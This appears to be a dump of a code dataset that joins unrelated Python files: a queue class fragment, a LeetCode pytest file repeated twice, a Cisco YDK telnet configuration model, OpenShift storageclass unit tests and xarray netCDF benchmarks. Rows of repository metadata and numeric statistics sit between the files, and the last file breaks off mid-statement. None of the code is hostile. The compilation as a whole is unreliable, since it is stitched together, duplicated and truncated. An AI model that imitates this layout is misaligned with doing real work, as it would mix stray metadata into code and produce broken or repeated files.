            raise ValueError
        item = self.list.head.data
        self.list.delete(item)
        return item
# Implement ArrayQueue below, then change the assignment at the bottom
# to use this Queue implementation to verify it passes all tests
class ArrayQueue(object):
    """FIFO queue backed by a Python list (dynamic array).

    Items are stored newest-first: enqueue prepends at index 0, so the
    front of the queue is the last live index, tracked by ``self.start``.
    """

    def __init__(self, iterable=None):
        """Initialize this queue and enqueue the given items, if any."""
        # Initialize a new list (dynamic array) to store the items.
        self.list = list()
        # Index of the front item; -1 means the queue is empty.
        self.start = -1
        if iterable is not None:
            for item in iterable:
                self.enqueue(item)

    def __repr__(self):
        """Return a string representation of this queue."""
        return 'Queue({} items, front={})'.format(self.length(), self.front())

    def is_empty(self):
        """Return True if this queue is empty, or False otherwise."""
        return self.start == -1

    def length(self):
        """Return the number of items in this queue."""
        return self.start + 1

    def enqueue(self, item):
        """Insert the given item at the back of this queue.
        Running time: O(n) -- every existing item shifts right when
        prepending to a dynamic array."""
        self.list.insert(0, item)
        self.start += 1

    def front(self):
        """Return the item at the front of this queue without removing it,
        or None if this queue is empty."""
        if self.is_empty():
            return None
        return self.list[self.start]

    def dequeue(self):
        """Remove and return the item at the front of this queue,
        or raise ValueError if this queue is empty.
        Running time: O(1) -- the front item is the last list element,
        so removing it requires no shifting.

        Bug fix: the previous version overwrote the slot with None and
        never shrank the list, so the array grew without bound over the
        queue's lifetime; pop() actually releases the slot.
        """
        if self.is_empty():
            raise ValueError('queue is empty')
        front = self.list.pop()
        self.start -= 1
        return front
# Implement LinkedQueue and ArrayQueue above, then change the assignment below
# to use each of your Queue implementations to verify they each pass all tests
# Queue = LinkedQueue
# Alias consumed by the test suite; point it at the implementation under test.
Queue = LinkedQueue
| 34.80531
| 80
| 0.61734
| 536
| 3,933
| 4.494403
| 0.201493
| 0.07472
| 0.03653
| 0.032379
| 0.723537
| 0.723537
| 0.704442
| 0.704442
| 0.704442
| 0.704442
| 0
| 0.00327
| 0.30028
| 3,933
| 112
| 81
| 35.116071
| 0.871003
| 0.461226
| 0
| 0.644068
| 0
| 0
| 0.02572
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.237288
| false
| 0
| 0.016949
| 0
| 0.525424
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
07b31e4d5a15ca561e2d14f056105447a6b78d17
| 1,330
|
py
|
Python
|
tests/test_1913.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
tests/test_1913.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
tests/test_1913.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import pytest
"""
Test 1913. Maximum Product Difference Between Two Pairs
"""
@pytest.fixture(scope="session")
def init_variables_1913():
    # Session-scoped fixture: construct the Solution once, then yield a
    # zero-argument factory that returns the shared instance to each test.
    from src.leetcode_1913_maximum_product_difference_between_two_pairs import Solution

    solution = Solution()

    def _init_variables_1913():
        return solution

    yield _init_variables_1913
class TestClass1913:
    """Tests for LeetCode 1913: Maximum Product Difference Between Two Pairs."""

    def test_solution_0(self, init_variables_1913):
        # max pair (7, 6) and min pair (2, 4): 42 - 8 == 34
        assert init_variables_1913().maxProductDifference([5, 6, 2, 7, 4]) == 34

    def test_solution_1(self, init_variables_1913):
        # max pair (9, 8) and min pair (2, 4): 72 - 8 == 64
        assert init_variables_1913().maxProductDifference([4, 2, 5, 9, 7, 4, 8]) == 64
#!/usr/bin/env python
import pytest
"""
Test 1913. Maximum Product Difference Between Two Pairs
"""
@pytest.fixture(scope="session")
def init_variables_1913():
    # NOTE(review): the file content appears twice; this is a duplicate of
    # the fixture defined earlier. Session-scoped: build Solution once and
    # yield a factory returning the shared instance.
    from src.leetcode_1913_maximum_product_difference_between_two_pairs import Solution

    solution = Solution()

    def _init_variables_1913():
        return solution

    yield _init_variables_1913
class TestClass1913:
    """Tests for LeetCode 1913 (duplicate copy of the class defined earlier)."""

    def test_solution_0(self, init_variables_1913):
        # max pair (7, 6) and min pair (2, 4): 42 - 8 == 34
        assert init_variables_1913().maxProductDifference([5, 6, 2, 7, 4]) == 34

    def test_solution_1(self, init_variables_1913):
        # max pair (9, 8) and min pair (2, 4): 72 - 8 == 64
        assert init_variables_1913().maxProductDifference([4, 2, 5, 9, 7, 4, 8]) == 64
| 23.333333
| 87
| 0.72782
| 176
| 1,330
| 5.193182
| 0.238636
| 0.199125
| 0.260394
| 0.122538
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.105455
| 0.172932
| 1,330
| 56
| 88
| 23.75
| 0.725455
| 0.030075
| 0
| 1
| 0
| 0
| 0.012048
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 1
| 0.307692
| false
| 0
| 0.153846
| 0.076923
| 0.615385
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 10
|
07b8f5b65e0d8a462fc3a964db7483661dfd184b
| 6,848
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ipv4_telnet_cfg.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 177
|
2016-03-15T17:03:51.000Z
|
2022-03-18T16:48:44.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ipv4_telnet_cfg.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 18
|
2016-03-30T10:45:22.000Z
|
2020-07-14T16:28:13.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ipv4_telnet_cfg.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 85
|
2016-03-16T20:38:57.000Z
|
2022-02-22T04:26:02.000Z
|
""" Cisco_IOS_XR_ipv4_telnet_cfg
This module contains a collection of YANG definitions
for Cisco IOS\-XR ipv4\-telnet package configuration.
This module contains definitions
for the following management objects\:
ipv6\-telnet\: IPv6 telnet configuration
ipv4\-telnet\: ipv4 telnet
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class Ipv6Telnet(_Entity_):
    """
    IPv6 telnet configuration

    .. attribute:: client

    Telnet client configuration

    **type**\: :py:class:`Client <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_telnet_cfg.Ipv6Telnet.Client>`

    """

    # YANG module prefix and revision this generated class was built from.
    _prefix = 'ipv4-telnet-cfg'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Ipv6Telnet, self).__init__()
        self._top_entity = None

        self.yang_name = "ipv6-telnet"
        self.yang_parent_name = "Cisco-IOS-XR-ipv4-telnet-cfg"
        self.is_top_level_class = True
        self.has_list_ancestor = False
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("client", ("client", Ipv6Telnet.Client))])
        self._leafs = OrderedDict()

        # Single child container: the telnet client configuration.
        self.client = Ipv6Telnet.Client()
        self.client.parent = self
        self._children_name_map["client"] = "client"
        self._segment_path = lambda: "Cisco-IOS-XR-ipv4-telnet-cfg:ipv6-telnet"
        # Freeze: further attribute writes go through _perform_setattr.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route attribute writes through the YDK validation machinery.
        self._perform_setattr(Ipv6Telnet, [], name, value)


    class Client(_Entity_):
        """
        Telnet client configuration

        .. attribute:: source_interface

        Source interface for telnet sessions

        **type**\: str

        **pattern:** [a\-zA\-Z0\-9.\_/\-]+

        """

        _prefix = 'ipv4-telnet-cfg'
        _revision = '2015-11-09'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(Ipv6Telnet.Client, self).__init__()

            self.yang_name = "client"
            self.yang_parent_name = "ipv6-telnet"
            self.is_top_level_class = False
            self.has_list_ancestor = False
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            # One string leaf: the source interface for telnet sessions.
            self._leafs = OrderedDict([
                ('source_interface', (YLeaf(YType.str, 'source-interface'), ['str'])),
            ])
            self.source_interface = None
            self._segment_path = lambda: "client"
            self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-telnet-cfg:ipv6-telnet/%s" % self._segment_path()
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(Ipv6Telnet.Client, ['source_interface'], name, value)

        @staticmethod
        def _meta_info():
            # Lazy import keeps the heavyweight meta tables out of normal loads.
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_telnet_cfg as meta
            return meta._meta_table['Ipv6Telnet.Client']['meta_info']

    def clone_ptr(self):
        # YDK clone hook: return a fresh top-level entity of this type.
        self._top_entity = Ipv6Telnet()
        return self._top_entity

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_telnet_cfg as meta
        return meta._meta_table['Ipv6Telnet']['meta_info']
class Ipv4Telnet(_Entity_):
    """
    ipv4 telnet

    .. attribute:: client

    Telnet client configuration

    **type**\: :py:class:`Client <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_telnet_cfg.Ipv4Telnet.Client>`

    """

    # YANG module prefix and revision this generated class was built from.
    _prefix = 'ipv4-telnet-cfg'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Ipv4Telnet, self).__init__()
        self._top_entity = None

        self.yang_name = "ipv4-telnet"
        self.yang_parent_name = "Cisco-IOS-XR-ipv4-telnet-cfg"
        self.is_top_level_class = True
        self.has_list_ancestor = False
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("client", ("client", Ipv4Telnet.Client))])
        self._leafs = OrderedDict()

        # Single child container: the telnet client configuration.
        self.client = Ipv4Telnet.Client()
        self.client.parent = self
        self._children_name_map["client"] = "client"
        self._segment_path = lambda: "Cisco-IOS-XR-ipv4-telnet-cfg:ipv4-telnet"
        # Freeze: further attribute writes go through _perform_setattr.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route attribute writes through the YDK validation machinery.
        self._perform_setattr(Ipv4Telnet, [], name, value)


    class Client(_Entity_):
        """
        Telnet client configuration

        .. attribute:: source_interface

        Source interface for telnet sessions

        **type**\: str

        **pattern:** [a\-zA\-Z0\-9.\_/\-]+

        """

        _prefix = 'ipv4-telnet-cfg'
        _revision = '2015-11-09'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(Ipv4Telnet.Client, self).__init__()

            self.yang_name = "client"
            self.yang_parent_name = "ipv4-telnet"
            self.is_top_level_class = False
            self.has_list_ancestor = False
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            # One string leaf: the source interface for telnet sessions.
            self._leafs = OrderedDict([
                ('source_interface', (YLeaf(YType.str, 'source-interface'), ['str'])),
            ])
            self.source_interface = None
            self._segment_path = lambda: "client"
            self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-telnet-cfg:ipv4-telnet/%s" % self._segment_path()
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(Ipv4Telnet.Client, ['source_interface'], name, value)

        @staticmethod
        def _meta_info():
            # Lazy import keeps the heavyweight meta tables out of normal loads.
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_telnet_cfg as meta
            return meta._meta_table['Ipv4Telnet.Client']['meta_info']

    def clone_ptr(self):
        # YDK clone hook: return a fresh top-level entity of this type.
        self._top_entity = Ipv4Telnet()
        return self._top_entity

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_telnet_cfg as meta
        return meta._meta_table['Ipv4Telnet']['meta_info']
| 30.846847
| 126
| 0.614924
| 782
| 6,848
| 5.025575
| 0.157289
| 0.063613
| 0.050891
| 0.049873
| 0.845293
| 0.829771
| 0.805598
| 0.805598
| 0.805598
| 0.786768
| 0
| 0.021311
| 0.273657
| 6,848
| 221
| 127
| 30.986425
| 0.768798
| 0.155812
| 0
| 0.704918
| 0
| 0
| 0.113801
| 0.040101
| 0
| 0
| 0
| 0
| 0
| 1
| 0.114754
| false
| 0
| 0.098361
| 0
| 0.327869
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
07bc0d80a44bfbc533c5c1111c7a191c9aad1bef
| 6,980
|
py
|
Python
|
roles/lib_openshift/src/test/unit/test_oc_storageclass.py
|
Roscoe198/Ansible-Openshift
|
b874bef456852ef082a27dfec4f2d7d466702370
|
[
"Apache-2.0"
] | 164
|
2015-07-29T17:35:04.000Z
|
2021-12-16T16:38:04.000Z
|
roles/lib_openshift/src/test/unit/test_oc_storageclass.py
|
Roscoe198/Ansible-Openshift
|
b874bef456852ef082a27dfec4f2d7d466702370
|
[
"Apache-2.0"
] | 3,634
|
2015-06-09T13:49:15.000Z
|
2022-03-23T20:55:44.000Z
|
roles/lib_openshift/src/test/unit/test_oc_storageclass.py
|
Roscoe198/Ansible-Openshift
|
b874bef456852ef082a27dfec4f2d7d466702370
|
[
"Apache-2.0"
] | 250
|
2015-06-08T19:53:11.000Z
|
2022-03-01T04:51:23.000Z
|
'''
Unit tests for oc serviceaccount
'''
import os
import sys
import unittest
import mock
import yaml
# Removing invalid variable names for tests so that I can
# keep them brief
# pylint: disable=invalid-name,no-name-in-module
# Disable import-error b/c our libraries aren't loaded in jenkins
# pylint: disable=import-error
# place class in our python path
module_path = os.path.join('/'.join(os.path.realpath(__file__).split('/')[:-4]), 'library') # noqa: E501
sys.path.insert(0, module_path)
from oc_storageclass import OCStorageClass # noqa: E402
class OCStorageClassTest(unittest.TestCase):
    '''
    Test class for OCStorageClass.

    Both creation tests share the same flow and differ only in whether the
    provisioner is passed unqualified ('aws-ebs') or fully qualified
    ('kubernetes.io/aws-ebs'); the shared body lives in _run_create_test.
    '''

    def _run_create_test(self, provisioner, mock_cmd, mock_tmpfile_copy,
                         mock_oc_binary, mock_tmpfile_create):
        ''' Shared body for the storageclass-creation tests.

        :param provisioner: value for the 'provisioner' ansible parameter
        (the only input that differs between the two tests); remaining
        args are the patched mocks in decorator order.
        '''
        # Arrange: run_ansible input parameters
        params = {
            'kubeconfig': '/etc/origin/master/admin.kubeconfig',
            'state': 'present',
            'debug': False,
            'name': 'testsc',
            'provisioner': provisioner,
            'annotations': {'storageclass.beta.kubernetes.io/is-default-class': "true"},
            'parameters': {'type': 'gp2'},
            'api_version': 'v1',
            'default_storage_class': 'true',
            'mount_options': ['debug'],
            'reclaim_policy': 'Delete'
        }

        # What `oc get storageclass testsc -o json` returns after creation.
        valid_result_json = '''{
    "kind": "StorageClass",
    "apiVersion": "v1",
    "metadata": {
        "name": "testsc",
        "selfLink": "/apis/storage.k8s.io/v1/storageclasses/gp2",
        "uid": "4d8320c9-e66f-11e6-8edc-0eece8f2ce22",
        "resourceVersion": "2828",
        "creationTimestamp": "2017-01-29T22:07:19Z",
        "annotations": {"storageclass.beta.kubernetes.io/is-default-class": "true"}
    },
    "provisioner": "kubernetes.io/aws-ebs",
    "parameters": {"type": "gp2"},
    "mountOptions": ['debug'],
    "reclaimPolicy": "Delete"
}'''

        # Return values of our mocked function call. These get returned once per call.
        mock_cmd.side_effect = [
            # First call to mock: the storageclass does not exist yet
            (1, '', 'Error from server: storageclass "testsc" not found'),
            # Second call to mock: creation succeeds
            (0, 'storageclass "testsc" created', ''),
            # Third call to mock: fetch the created object
            (0, valid_result_json, ''),
        ]

        mock_oc_binary.side_effect = [
            'oc'
        ]

        mock_tmpfile_copy.side_effect = [
            '/tmp/mocked_kubeconfig',
        ]

        generated_yaml_spec_file = '/tmp/spec_output_yaml'
        mock_tmpfile_create.side_effect = [
            generated_yaml_spec_file,
        ]

        # Act
        results = OCStorageClass.run_ansible(params, False)
        with open(generated_yaml_spec_file) as json_data:
            # safe_load: yaml.load without an explicit Loader is deprecated
            # and unsafe; the spec file only needs plain YAML types
            generated_spec = yaml.safe_load(json_data)

        # Assert
        # NOTE(review): assertTrue's second argument is a failure *message*,
        # not an expected value, so this only checks truthiness -- likely
        # meant assertEqual. Confirm OCStorageClass qualifies unqualified
        # provisioners before tightening.
        self.assertTrue(generated_spec['provisioner'], 'kubernetes.io/aws-ebs')
        self.assertTrue(results['changed'])
        self.assertEqual(results['results']['returncode'], 0)
        self.assertEqual(results['state'], 'present')

        # Making sure our mock was called as we expected
        mock_cmd.assert_has_calls([
            mock.call(['oc', 'get', 'storageclass', 'testsc', '-o', 'json'], None),
            mock.call(['oc', 'create', '-f', mock.ANY], None),
            mock.call(['oc', 'get', 'storageclass', 'testsc', '-o', 'json'], None),
        ])

    @mock.patch('oc_storageclass.Utils.create_tmpfile')
    @mock.patch('oc_storageclass.locate_oc_binary')
    @mock.patch('oc_storageclass.Utils.create_tmpfile_copy')
    @mock.patch('oc_storageclass.OCStorageClass._run')
    def test_adding_a_storageclass_without_qualification(self, mock_cmd, mock_tmpfile_copy, mock_oc_binary, mock_tmpfile_create):
        ''' Testing adding a storageclass with an unqualified provisioner '''
        self._run_create_test('aws-ebs', mock_cmd, mock_tmpfile_copy,
                              mock_oc_binary, mock_tmpfile_create)

    @mock.patch('oc_storageclass.Utils.create_tmpfile')
    @mock.patch('oc_storageclass.locate_oc_binary')
    @mock.patch('oc_storageclass.Utils.create_tmpfile_copy')
    @mock.patch('oc_storageclass.OCStorageClass._run')
    def test_adding_a_storageclass_with_qualification(self, mock_cmd, mock_tmpfile_copy, mock_oc_binary, mock_tmpfile_create):
        ''' Testing adding a storageclass with a fully-qualified provisioner '''
        self._run_create_test('kubernetes.io/aws-ebs', mock_cmd, mock_tmpfile_copy,
                              mock_oc_binary, mock_tmpfile_create)
| 34.9
| 129
| 0.575215
| 722
| 6,980
| 5.376731
| 0.257618
| 0.032458
| 0.022669
| 0.047398
| 0.874807
| 0.871716
| 0.871716
| 0.871716
| 0.871716
| 0.871716
| 0
| 0.020028
| 0.28467
| 6,980
| 199
| 130
| 35.075377
| 0.75746
| 0.121777
| 0
| 0.80916
| 0
| 0.015267
| 0.435234
| 0.166612
| 0
| 0
| 0
| 0
| 0.076336
| 1
| 0.015267
| false
| 0
| 0.045802
| 0
| 0.068702
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
07bcc6d71b4a266654ba701275e8ad2b66116bc2
| 16,435
|
py
|
Python
|
asv_bench/benchmarks/dataset_io.py
|
DocOtak/xarray
|
01a9baa01b1378cbf3f324ea3c27150a3860d3d1
|
[
"Apache-2.0"
] | 1
|
2020-09-14T02:32:54.000Z
|
2020-09-14T02:32:54.000Z
|
asv_bench/benchmarks/dataset_io.py
|
DocOtak/xarray
|
01a9baa01b1378cbf3f324ea3c27150a3860d3d1
|
[
"Apache-2.0"
] | null | null | null |
asv_bench/benchmarks/dataset_io.py
|
DocOtak/xarray
|
01a9baa01b1378cbf3f324ea3c27150a3860d3d1
|
[
"Apache-2.0"
] | 2
|
2019-08-22T21:07:03.000Z
|
2020-03-30T10:25:00.000Z
|
from __future__ import absolute_import, division, print_function
import os
import numpy as np
import pandas as pd
import xarray as xr
from . import randint, randn, requires_dask
# Optional dask import: the Dask-based benchmarks below need it, but the
# module must still import cleanly when dask is absent (requires_dask()
# handles skipping in that case).
try:
    import dask
    import dask.multiprocessing
except ImportError:
    pass

# Disable HDF5 file locking so the benchmark reads/writes don't fail on
# files still held open elsewhere.
os.environ['HDF5_USE_FILE_LOCKING'] = 'FALSE'
class IOSingleNetCDF:
    """
    A few examples that benchmark reading/writing a single netCDF file with
    xarray
    """

    # asv benchmark settings: generous timeout, one repeat of 5 runs each.
    timeout = 300.
    repeat = 1
    number = 5

    def make_ds(self):
        """Build the synthetic (time, lon, lat) dataset the benchmarks use."""
        # single Dataset
        self.ds = xr.Dataset()
        self.nt = 1000
        self.nx = 90
        self.ny = 45

        # Chunking schemes exercised by the dask benchmarks below.
        self.block_chunks = {'time': self.nt / 4,
                             'lon': self.nx / 3,
                             'lat': self.ny / 3}

        self.time_chunks = {'time': int(self.nt / 36)}

        times = pd.date_range('1970-01-01', periods=self.nt, freq='D')
        lons = xr.DataArray(np.linspace(0, 360, self.nx), dims=('lon', ),
                            attrs={'units': 'degrees east',
                                   'long_name': 'longitude'})
        lats = xr.DataArray(np.linspace(-90, 90, self.ny), dims=('lat', ),
                            attrs={'units': 'degrees north',
                                   'long_name': 'latitude'})
        # Two 3-d float variables with 20% NaNs plus one 2-d float32 variable.
        self.ds['foo'] = xr.DataArray(randn((self.nt, self.nx, self.ny),
                                            frac_nan=0.2),
                                      coords={'lon': lons, 'lat': lats,
                                              'time': times},
                                      dims=('time', 'lon', 'lat'),
                                      name='foo', encoding=None,
                                      attrs={'units': 'foo units',
                                             'description': 'a description'})
        self.ds['bar'] = xr.DataArray(randn((self.nt, self.nx, self.ny),
                                            frac_nan=0.2),
                                      coords={'lon': lons, 'lat': lats,
                                              'time': times},
                                      dims=('time', 'lon', 'lat'),
                                      name='bar', encoding=None,
                                      attrs={'units': 'bar units',
                                             'description': 'a description'})
        self.ds['baz'] = xr.DataArray(randn((self.nx, self.ny),
                                            frac_nan=0.2).astype(np.float32),
                                      coords={'lon': lons, 'lat': lats},
                                      dims=('lon', 'lat'),
                                      name='baz', encoding=None,
                                      attrs={'units': 'baz units',
                                             'description': 'a description'})

        self.ds.attrs = {'history': 'created for xarray benchmarking'}

        # Indexer dicts for the orthogonal/vectorized indexing benchmarks.
        self.oinds = {'time': randint(0, self.nt, 120),
                      'lon': randint(0, self.nx, 20),
                      'lat': randint(0, self.ny, 10)}
        self.vinds = {'time': xr.DataArray(randint(0, self.nt, 120),
                                           dims='x'),
                      'lon': xr.DataArray(randint(0, self.nx, 120),
                                          dims='x'),
                      'lat': slice(3, 20)}
class IOWriteSingleNetCDF3(IOSingleNetCDF):
    """Benchmark writing the single synthetic dataset as NETCDF3_64BIT."""

    def setup(self):
        self.format = 'NETCDF3_64BIT'
        self.make_ds()

    def time_write_dataset_netcdf4(self):
        # The netcdf4 engine can also write the NETCDF3_64BIT format.
        self.ds.to_netcdf('test_netcdf4_write.nc', engine='netcdf4',
                          format=self.format)

    def time_write_dataset_scipy(self):
        self.ds.to_netcdf('test_scipy_write.nc', engine='scipy',
                          format=self.format)
class IOReadSingleNetCDF4(IOSingleNetCDF):
    """Benchmark non-dask reads of a single NETCDF4 file."""

    def setup(self):
        self.make_ds()

        # Write the fixture file once; each benchmark re-opens it.
        self.filepath = 'test_single_file.nc4.nc'
        self.format = 'NETCDF4'
        self.ds.to_netcdf(self.filepath, format=self.format)

    def time_load_dataset_netcdf4(self):
        xr.open_dataset(self.filepath, engine='netcdf4').load()

    def time_orthogonal_indexing(self):
        ds = xr.open_dataset(self.filepath, engine='netcdf4')
        ds = ds.isel(**self.oinds).load()

    def time_vectorized_indexing(self):
        ds = xr.open_dataset(self.filepath, engine='netcdf4')
        ds = ds.isel(**self.vinds).load()
class IOReadSingleNetCDF3(IOReadSingleNetCDF4):
    """Benchmark non-dask reads of a single NETCDF3 file via the scipy engine."""

    def setup(self):
        self.make_ds()

        # Write the fixture file once; each benchmark re-opens it.
        self.filepath = 'test_single_file.nc3.nc'
        self.format = 'NETCDF3_64BIT'
        self.ds.to_netcdf(self.filepath, format=self.format)

    def time_load_dataset_scipy(self):
        xr.open_dataset(self.filepath, engine='scipy').load()

    def time_orthogonal_indexing(self):
        ds = xr.open_dataset(self.filepath, engine='scipy')
        ds = ds.isel(**self.oinds).load()

    def time_vectorized_indexing(self):
        ds = xr.open_dataset(self.filepath, engine='scipy')
        ds = ds.isel(**self.vinds).load()
class IOReadSingleNetCDF4Dask(IOSingleNetCDF):
    """Benchmark dask-chunked reads of a single NETCDF4 file."""

    def setup(self):
        requires_dask()

        self.make_ds()

        # Write the fixture file once; each benchmark re-opens it.
        self.filepath = 'test_single_file.nc4.nc'
        self.format = 'NETCDF4'
        self.ds.to_netcdf(self.filepath, format=self.format)

    def time_load_dataset_netcdf4_with_block_chunks(self):
        xr.open_dataset(self.filepath, engine='netcdf4',
                        chunks=self.block_chunks).load()

    def time_load_dataset_netcdf4_with_block_chunks_oindexing(self):
        ds = xr.open_dataset(self.filepath, engine='netcdf4',
                             chunks=self.block_chunks)
        ds = ds.isel(**self.oinds).load()

    def time_load_dataset_netcdf4_with_block_chunks_vindexing(self):
        ds = xr.open_dataset(self.filepath, engine='netcdf4',
                             chunks=self.block_chunks)
        ds = ds.isel(**self.vinds).load()

    def time_load_dataset_netcdf4_with_block_chunks_multiprocessing(self):
        # Same load, but forcing dask's multiprocessing scheduler.
        with dask.config.set(scheduler="multiprocessing"):
            xr.open_dataset(self.filepath, engine='netcdf4',
                            chunks=self.block_chunks).load()

    def time_load_dataset_netcdf4_with_time_chunks(self):
        xr.open_dataset(self.filepath, engine='netcdf4',
                        chunks=self.time_chunks).load()

    def time_load_dataset_netcdf4_with_time_chunks_multiprocessing(self):
        with dask.config.set(scheduler="multiprocessing"):
            xr.open_dataset(self.filepath, engine='netcdf4',
                            chunks=self.time_chunks).load()
class IOReadSingleNetCDF3Dask(IOReadSingleNetCDF4Dask):
    """Benchmark dask-chunked reads of a single NETCDF3 file via scipy."""

    def setup(self):
        requires_dask()

        self.make_ds()

        # Write the fixture file once; each benchmark re-opens it.
        self.filepath = 'test_single_file.nc3.nc'
        self.format = 'NETCDF3_64BIT'
        self.ds.to_netcdf(self.filepath, format=self.format)

    def time_load_dataset_scipy_with_block_chunks(self):
        # NOTE: unlike the netcdf4 counterpart, this one runs under the
        # multiprocessing scheduler.
        with dask.config.set(scheduler="multiprocessing"):
            xr.open_dataset(self.filepath, engine='scipy',
                            chunks=self.block_chunks).load()

    def time_load_dataset_scipy_with_block_chunks_oindexing(self):
        ds = xr.open_dataset(self.filepath, engine='scipy',
                             chunks=self.block_chunks)
        ds = ds.isel(**self.oinds).load()

    def time_load_dataset_scipy_with_block_chunks_vindexing(self):
        ds = xr.open_dataset(self.filepath, engine='scipy',
                             chunks=self.block_chunks)
        ds = ds.isel(**self.vinds).load()

    def time_load_dataset_scipy_with_time_chunks(self):
        with dask.config.set(scheduler="multiprocessing"):
            xr.open_dataset(self.filepath, engine='scipy',
                            chunks=self.time_chunks).load()
class IOMultipleNetCDF:
    """
    A few examples that benchmark reading/writing multiple netCDF files with
    xarray
    """

    # asv benchmark settings: generous timeout, one repeat of 5 runs each.
    timeout = 300.
    repeat = 1
    number = 5

    def make_ds(self, nfiles=10):
        """Build `nfiles` synthetic datasets that partition the time axis."""
        # multiple Dataset
        self.ds = xr.Dataset()
        self.nt = 1000
        self.nx = 90
        self.ny = 45
        self.nfiles = nfiles

        # Chunking schemes exercised by the dask benchmarks below.
        self.block_chunks = {'time': self.nt / 4,
                             'lon': self.nx / 3,
                             'lat': self.ny / 3}

        self.time_chunks = {'time': int(self.nt / 36)}

        # One contiguous slice of the time range per output file.
        self.time_vars = np.split(
            pd.date_range('1970-01-01', periods=self.nt, freq='D'),
            self.nfiles)

        self.ds_list = []
        self.filenames_list = []
        for i, times in enumerate(self.time_vars):
            ds = xr.Dataset()
            nt = len(times)
            lons = xr.DataArray(np.linspace(0, 360, self.nx), dims=('lon', ),
                                attrs={'units': 'degrees east',
                                       'long_name': 'longitude'})
            lats = xr.DataArray(np.linspace(-90, 90, self.ny), dims=('lat', ),
                                attrs={'units': 'degrees north',
                                       'long_name': 'latitude'})
            # Two 3-d float variables with 20% NaNs plus one 2-d float32 one.
            ds['foo'] = xr.DataArray(randn((nt, self.nx, self.ny),
                                           frac_nan=0.2),
                                     coords={'lon': lons, 'lat': lats,
                                             'time': times},
                                     dims=('time', 'lon', 'lat'),
                                     name='foo', encoding=None,
                                     attrs={'units': 'foo units',
                                            'description': 'a description'})
            ds['bar'] = xr.DataArray(randn((nt, self.nx, self.ny),
                                           frac_nan=0.2),
                                     coords={'lon': lons, 'lat': lats,
                                             'time': times},
